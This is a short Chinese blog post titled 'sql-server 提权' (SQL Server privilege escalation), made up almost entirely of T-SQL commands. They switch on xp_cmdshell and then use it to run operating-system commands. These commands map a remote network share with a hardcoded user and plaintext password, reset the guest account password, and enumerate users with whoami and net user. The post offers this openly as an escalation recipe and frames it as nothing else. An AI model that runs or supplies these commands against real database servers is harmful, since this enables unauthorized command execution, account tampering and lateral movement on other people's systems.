sql-server 提权

  数据库开启cmdshell

EXEC sp_configure 'show advanced options', 1
GO
RECONFIGURE
GO

EXEC sp_configure 'xp_cmdshell',1
GO
RECONFIGURE
GO

EXEC master..xp_cmdshell 'net use Z: \\192.168.11.1\192.168.11.4BACKUP "bst123456" /user:192.168.11.1\shuiniao'
GO
exec master..xp_cmdshell 'net use \\192.168.11.1\ del'
exec master..xp_cmdshell 'net user guest testtest123!'

  

exec master..xp_cmdshell 'whoami&&net user'

 

 

posted @ 2017-09-19 15:47  Jas502n  阅读(733)  评论(0)    收藏  举报